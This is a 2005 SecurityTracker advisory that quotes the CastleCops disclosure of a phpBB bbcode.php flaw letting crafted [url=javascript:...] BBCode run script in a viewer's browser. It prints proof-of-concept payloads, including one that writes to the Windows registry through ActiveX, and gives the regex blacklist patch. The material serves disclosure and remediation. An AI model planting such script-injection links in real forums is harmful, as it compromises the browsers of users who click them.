SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Forum/Board/Portal)  >   phpBB Vendors:   phpBB Group
(Exploit Details Are Provided) phpBB 'bbcode.php' Input Validation Flaw May Let Remote Users Execute Arbitrary Scripting Code
SecurityTracker Alert ID:  1014102
SecurityTracker URL:  http://securitytracker.com/id/1014102
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 3 2005
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): prior to 2.0.15
Description:   Paul Laudanski reported a vulnerability in phpBB in the processing of BBCode. A remote user may be able to cause scripting code to be executed by the target user.

The make_clickable() function in the 'includes/bbcode.php' file does not properly validate user-supplied BBCode URLs. A remote user can create specially crafted BBCode that may be able to cause arbitrary scripting code to be executed by the target user's browser.

Some demonstration exploits are provided:

[url=javascript://%0ASh=alert(%22CouCou%22);window.close();]Alert box with "CouCou"[/url]

[url=javascript://%0ASh=new%20ActiveXObject(%22WScript.shell%22);Sh.regwrite(%22HKCU%5C%5CQQQQQ%5C%5Cqq%22,%22CouCou%22);window.close();]Create registry ent

[url=javascript://%0Awindow.opener.document.body.innerHTML=window.opener.document.body.innerHTML.replace(%27Hi%20Paul%27,%27Hi%20P.A.U.L%27);window.close();

The vendor was notified on April 20, 2005.

Papados and Paul Laudanski from CastleCops discovered this vulnerability.
Impact:   A remote user may be able to cause arbitrary scripting code to be executed by the target user's browser.
Solution:   The vendor has released a fixed version (2.0.15), available at:

http://www.phpbb.com/downloads.php
Vendor URL:  www.phpbb.com/phpBB/viewtopic.php?f=14&t=288194 (Links to External Site)
Cause:   Input validation error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry is a follow-up to the message listed below.
May 9 2005 phpBB 'bbcode.php' Input Validation Flaw May Let Remote Users Execute Arbitrary Scripting Code


 Source Message Contents
Date:  Thu, 2 Jun 2005 15:33:01 -0400 (EDT)
Subject:  CastleCops phpBB bbcode Input Validation Disclosure


*CASTLECOPS.COM SUMMARY

bbcode input validation

Severity: High
CastleCops: http://castlecops.com/t123194-.html
CVE: CAN-2005-1193
phpBB Security ID#: 266
Bugtraq ID#: 13545
Secunia #: 15298
US-CERT VU#: 113196
SecurityTracker #: 1013918

Vulnerable: viewtopic.php, privmsg.php for phpBB 2.0.14 (possible all
lower versions too), and other files that rely on bbcode.php

Fix: Upgrade to 2.0.15


*INTRODUCTION

phpBB is a popular bulletin board system based on PHP. There is a lack of
filtering for the BBCODE URL. Initially discovered: encapsulating a
specially crafted URL, a user caught clicking on the resulting hyperlinks
can have their registry entries modified without their knowledge [huge
hazard!], among other things. Originally successfully tested with
"javascript://", but subsequent discovery showed that "applet://",
"about://", "activex://", "chrome://", and "script://" may be able to get
thru as well with the URL enclosure or not (of course, browser dependant).

It is recommended that these types of URIs not be allowed to render at all
in the phpBB system as the possible user computer hijacking can be
gargantuan. There is enough hijacking in spyware products (ref:
http://castlecops.com/f67-Hijackthis_Spyware_Viruses_Worms_Trojans_Oh_My.html
).


*PROOF OF CONCEPT

This POC uses the URL encapsulation:

[url=javascript://%0ASh=alert(%22CouCou%22);window.close();]Alert box with "CouCou"[/url]

[url=javascript://%0ASh=new%20ActiveXObject(%22WScript.shell%22);Sh.regwrite(%22HKCU%5C%5CQQQQQ%5C%5Cqq%22,%22CouCou%22);window.close();]Create registry entry: HKCU\QQQQQ\qq = "CouCou"[/url]

[url=javascript://%0Awindow.opener.document.body.innerHTML=window.opener.document.body.innerHTML.replace(%27Hi%20Paul%27,%27Hi%20P.A.U.L%27);window.close();]Modify opener page: Paul -> P.A.U.L[/url]


If you click on the second link, be sure to find and remove the "QQQQQ"
entry in your Windows Registry. However, we recommend you do not click
expect for developer testing and patching.


*FIX

The CastleCops suggested patch was integrated into bbcode.php. That
suggested patch is within the includes/bbcode.php file,
bbencode_second_pass function, after the global line (and a second
location):

+ $text = preg_replace('#(script|about|applet|activex|chrome):#is',"\\1:",$text);

This particular patch replaces the colon with its decimal equivalent and
will bypass hyperlink creation on viewing a topic or a private message.
Both the POC and patch have been tested on some sites with success.

This patch has been included in the phpbb 2.0.15 release.  Please be sure
to read the release in its entirety for the precise update:

http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=288194


*COMMENTARY

Possible alternative patches? 

Modsecurity adds a nice layer of security in filtering requests to a
website. However, the links above in the POC clearly show the web server
may not process them as they are client side driven.  Modsecurity would
not help in the examples above.

Whitelisting is another method, however it was decided to utilize the
blacklist above by phpbb.


*WEB BROWSERS USED

Basic tests were done using Firefox and Internet Explorer.  Your own 
mileage may vary.


*CREDITS

Discovery and patch by Papados and Paul Laudanski at http://castlecops.com


*HISTORY

Vendor A: phpbb.com
Date Discovered: 20 Apr 2005
Patch Given: 20 Apr 2005
Vendor Notified: 20 Apr 2005
Acknowledged: 20 Apr 2005
Patch Released: 7 May 2005
Pre-Full Disclosure: 8 May 2005
Full Disclosure: 02 Jun 2005


Vendor B: (nameless)
Vendor Notified: 12 May 2005
Acknowledged: 12 May 2005
Responded: 26 May 2005 (Deemed a non-issue)


*DISCLAIMER AND LICENSE

ALL SUCH INFORMATION, SOFTWARE, PRODUCTS, AND SERVICES ARE PROVIDED "AS
IS" WITHOUT WARRANTY OF ANY KIND. CASTLECOPS, ITS AFFILIATES, AND/OR THEIR
RESPECTIVE SUPPLIERS HEREBY DISCLAIM ALL WARRANTIES AND CONDITIONS WITH
REGARD TO THIS INFORMATION, SOFTWARE, PRODUCTS, AND SERVICES, INCLUDING
ALL IMPLIED WARRANTIES AND CONDITIONS OF MERCHANTABILITY, FITNESS FOR A
PARTICULAR PURPOSE, TITLE, AND NONINFRINGEMENT.

Subject to terms in the CastleCops AUP:  
http://castlecops.com/article1.html.

-- 
Sincerely,

Paul Laudanski .. Computer Cops, LLC.
Microsoft MVP Windows-Security 2005
CastleCops(SM)... http://castlecops.com
CCWiki .......... http://wiki.castlecops.com
CCForums ........ http://castlecops.com/forums.html

BHO/Toolbars: http://castlecops.com/CLSID.html
Windows XP/NT Services: http://castlecops.com/O23.html
Extra IE Buttons: http://castlecops.com/O9.html
Layered Service Providers: http://castlecops.com/LSPs.html
StartupList: http://castlecops.com/StartupList.html


________ Information from Computer Cops, L.L.C. ________
This message was checked by NOD32 Antivirus System for Linux Mail Server.

  part000.txt - is OK
http://castlecops.com


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2012, SecurityGlobal.net LLC